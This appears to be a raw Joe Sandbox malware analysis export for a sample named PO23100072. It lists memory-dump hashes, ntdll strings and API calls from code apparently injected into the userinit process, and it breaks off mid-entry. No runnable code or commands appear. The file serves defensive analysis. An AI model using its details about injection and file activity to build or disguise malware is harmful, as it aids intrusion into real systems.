                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                                • Instruction ID: 542fa46c1c09bdf752870486bb3e02cb083f04796fe813daf2275f8fc1d2d118
                                                                • Opcode Fuzzy Hash: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                                • Instruction Fuzzy Hash: 1F90022120944442D60076585408A074005D7D1205F55D025A20645B5DC735CA65A232
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                                • Instruction ID: 65921516359d62f8d5d3d0be205e1e26da0dc8636cbae108dd6a7fa2482c6dfb
                                                                • Opcode Fuzzy Hash: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                                • Instruction Fuzzy Hash: 04900221246441525A45B25844045078006E7E1241795C026A2414970CC626DA6AD722
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                                • Instruction ID: 8444e8c5c073f08537f5feee0e5ad5f02bc349f8d6c074850bdbcaa0278670ac
                                                                • Opcode Fuzzy Hash: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                                • Instruction Fuzzy Hash: 5990023124540402D641725844046074009E7D1241F95C026A1424574EC755CB6AAB62
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                                • Instruction ID: 46c990dd8ed61010dd6670d268d27b14a518f24a921ec6edbfbf1a7cb9b8fd13
                                                                • Opcode Fuzzy Hash: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                                • Instruction Fuzzy Hash: 2490023120540842D60072584404B474005D7E1301F55C02AA1124674DC715CA657622
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                                • Instruction ID: 517ad7e89975005f97a2a8a5e667bc5ea15cb1d4b5e75f3dc0b28dd1704168f0
                                                                • Opcode Fuzzy Hash: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                                • Instruction Fuzzy Hash: 7D90023120540403D600725855087074005D7D1201F55D425A1424578DD756CA656222
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                                • Instruction ID: 79336149b241350bb2d54b870bdcfdbd48e0d8f5ee45252b92eba27cbca614a1
                                                                • Opcode Fuzzy Hash: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                                • Instruction Fuzzy Hash: A690022160940402D640725854187074015D7D1201F55D025A1024574DC759CB6967A2
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                                • Instruction ID: fd27892a745314af67f8a0688a96114a181443fe2dba9f9ab1fcdc923572a964
                                                                • Opcode Fuzzy Hash: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                                • Instruction Fuzzy Hash: D590023120540402D600769854086474005D7E1301F55D025A6024575EC765CAA56232
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                                • Instruction ID: 2841014abdc4105725c73c00277c66941673532dd50bf5416d59aef19869d387
                                                                • Opcode Fuzzy Hash: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                                • Instruction Fuzzy Hash: 7090026121540042D604725844047074045D7E2201F55C026A3154574CC629CE755226
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                                • Instruction ID: 6b7912cbe98c6291d18cdd3d23f79d03c31e2cce709b24ae8e4f3bd5564c3674
                                                                • Opcode Fuzzy Hash: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                                • Instruction Fuzzy Hash: E690026134540442D60072584414B074005D7E2301F55C029E2064574DC719CE666227
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                                • Instruction ID: 0fca94e7977060ebeb59763a7dc45cb4d812b3cb0d3e7c2aabcc05a946e0f4f6
                                                                • Opcode Fuzzy Hash: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                                • Instruction Fuzzy Hash: 96900221215C0042D70076684C14B074005D7D1303F55C129A1154574CCA15CA755622
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                Strings
                                                                • Execute=1, xrefs: 01814713
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                                • ExecuteOptions, xrefs: 018146A0
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                                • RTL: Re-Waiting, xrefs: 0181031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 01817B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                                • RTL: Re-Waiting, xrefs: 01817BAC
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 018172A3
                                                                • RTL: Re-Waiting, xrefs: 018172C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                                • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0
                                                                APIs
                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0182CFBD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: CallFilterFunc@8
                                                                • String ID: @$@4Qw@4Qw
                                                                • API String ID: 4062629308-2383119779
                                                                • Opcode ID: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                                • Instruction ID: 084a9f5174b8fc094d1b162a9402e10e031d6a62d059cca4c1b5fed9c858603a
                                                                • Opcode Fuzzy Hash: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                                • Instruction Fuzzy Hash: E941B271900229DFCB229FA9C884AAEFBF8FF54740F14412AE915DB264D774DA41CB61

                                                                Execution Graph

                                                                Execution Coverage:2.6%
                                                                Dynamic/Decrypted Code Coverage:4.1%
                                                                Signature Coverage:2.2%
                                                                Total number of Nodes:464
                                                                Total number of Limit Nodes:75

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #o$,$,!$.$.DXd$0$1|$61$6T$@8$D4$E$J$T$Xd$ZW$b$f
                                                                • API String ID: 0-2960789933
                                                                • Opcode ID: 35590c8b130e87213382511bdfffc95edf34350a7e3aa2f829abf5579503ecfc
                                                                • Instruction ID: b5e2eb09179083082fa58fc58c209d0d85d0f22e6f74053448fe16168cda3646
                                                                • Opcode Fuzzy Hash: 35590c8b130e87213382511bdfffc95edf34350a7e3aa2f829abf5579503ecfc
                                                                • Instruction Fuzzy Hash: 79E1D0B0E0626DCFEB24CF44C994BEDBBB2BB45308F1085D9D1596B291C7B91A88CF51
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0301C374
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0301C3AF
                                                                • FindClose.KERNELBASE(?), ref: 0301C3BA
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: 66c96e6f90ef2f9e47d2401661692ba17a794f59cb98951b2a74a0c6821fe9ec
                                                                • Instruction ID: 484a4d4c67108a5d8b791250b432f446d66e7d2bbdf062526fbe73b0dc46edaf
                                                                • Opcode Fuzzy Hash: 66c96e6f90ef2f9e47d2401661692ba17a794f59cb98951b2a74a0c6821fe9ec
                                                                • Instruction Fuzzy Hash: E231A675941308BBEB64EF60CC85FFF77BC9F84704F144559B908AB180DB70AA948BA1
                                                                APIs
                                                                • NtCreateFile.NTDLL(2888A750,?,?,?,?,?,?,?,?,?,?), ref: 03028E8E
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 8263e9b9b3655f0d7f7f85571750a182001a6f476e1524a903f998bad7412ed5
                                                                • Instruction ID: ca130d6d42a301374862dd07c8931b6a4b6043451a95a3252b06860805374a40
                                                                • Opcode Fuzzy Hash: 8263e9b9b3655f0d7f7f85571750a182001a6f476e1524a903f998bad7412ed5
                                                                • Instruction Fuzzy Hash: 0931A3B5A01208AFDB14DF98D880EDEBBB9AF8C314F508109F919A7340D730A951CBA5
                                                                APIs
                                                                • NtReadFile.NTDLL(2888A750,?,?,?,?,?,?,?,?), ref: 03028FE9
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: f9e2abaf3592445059f4fccfabe1212306f5964c21800777085ab5dbbfcdb515
                                                                • Instruction ID: 747cfbdc482e32cfa59ee68924261365c4e599ecea6694cd580d209c09d0369d
                                                                • Opcode Fuzzy Hash: f9e2abaf3592445059f4fccfabe1212306f5964c21800777085ab5dbbfcdb515
                                                                • Instruction Fuzzy Hash: 9A31C7B5A01608AFDB14DF98D881EEFBBB9EF8C310F108119FD18A7340D670A9558FA5
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(2888A750,?,03027CDF,00000000,00000004,00003000,?,?,?,?,?,03027CDF,030119EE,030119EE,00000000,?), ref: 030292D8
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: 9748e708b96aa18100ac35f0450ba1d82ff0ea418837c52caf31f50557a53c81
                                                                • Instruction ID: 0747bb72f30b3c77bfc4bbcad18ae4a0d55a2d7d49b2ecf48646f157ea973a3d
                                                                • Opcode Fuzzy Hash: 9748e708b96aa18100ac35f0450ba1d82ff0ea418837c52caf31f50557a53c81
                                                                • Instruction Fuzzy Hash: 0221E6B5A01209AFDB14DF98DC81FEFBBB9EF88710F108109FD18A7240D774A9158BA5
                                                                APIs
                                                                • NtDeleteFile.NTDLL(2888A750), ref: 03029099
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                • Opcode ID: 32f47c7f7706f169638fbfc647d15ffa62a41e2f99afdc25711ee14c5b4c1205
                                                                • Instruction ID: 64050d2a9664920882b5ae8f25b08722f3b836669d878f73d0e03c21d7884d30
                                                                • Opcode Fuzzy Hash: 32f47c7f7706f169638fbfc647d15ffa62a41e2f99afdc25711ee14c5b4c1205
                                                                • Instruction Fuzzy Hash: DE119E75641708BED624EB64CC41FEF7BACDFC5314F408109FA08AB280D6717A158BA5
                                                                APIs
                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030290E7
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                                • Instruction ID: ad76481d9f1f1d520d89e7e65acc29b84d6678d3f05844dabe1079dadcf688e0
                                                                • Opcode Fuzzy Hash: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                                • Instruction Fuzzy Hash: 14E04F362003147BD620EA59DC40FDB776CDFC6750F414015FA09AB140CA71B91587F5
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b76752e9f5434cb179dfa54d6d85e33a41b1bca4687c96c98d643869f289830a
                                                                • Instruction ID: 05fffe6009b48b8d4f6e07590d557887869c02cf906eeb2b929b9577fbe785b9
                                                                • Opcode Fuzzy Hash: b76752e9f5434cb179dfa54d6d85e33a41b1bca4687c96c98d643869f289830a
                                                                • Instruction Fuzzy Hash: A690023164580422A140B25848C4586400697E0311B95C021E0424568C8B148A565363
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: bbbd67f89ce2659a449c11abc161b016d33dedd8bb7844066d55f1a0efb820c2
                                                                • Instruction ID: 9f6034c568eabfdaf0c2e47c60c6f708f4538fce838069e431de605fe0a14a09
                                                                • Opcode Fuzzy Hash: bbbd67f89ce2659a449c11abc161b016d33dedd8bb7844066d55f1a0efb820c2
                                                                • Instruction Fuzzy Hash: C890023124140823E111B2584584747000A87D0351FD5C422A042456CD97568A52A123
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 81f49b60628e2ef02c38a6a068a103ba99931713ec1b48b137d785e31814d7a6
                                                                • Instruction ID: de90223db0a197316014b1d3d92a172e49ee224e11891a55dbb6319160ee72dd
                                                                • Opcode Fuzzy Hash: 81f49b60628e2ef02c38a6a068a103ba99931713ec1b48b137d785e31814d7a6
                                                                • Instruction Fuzzy Hash: 28900221282445626545F2584484547400797E03517D5C022A1414964C86269956D623
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3eb7011927cb01bf7b45870d7c7ecd4519663ffca0d6ebbdadd6aeaac32ceacd
                                                                • Instruction ID: c179e1ba678b5ba94903426f59eb340adae52e224be21bedaaf7553577f7d5f1
                                                                • Opcode Fuzzy Hash: 3eb7011927cb01bf7b45870d7c7ecd4519663ffca0d6ebbdadd6aeaac32ceacd
                                                                • Instruction Fuzzy Hash: 6A90023124148C12E110B258848478A000687D0311F99C421A442466CD879589917123
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 46bc739af967718442d05418bde317b80dc344cb68a8e2ce7591e3e738844c7e
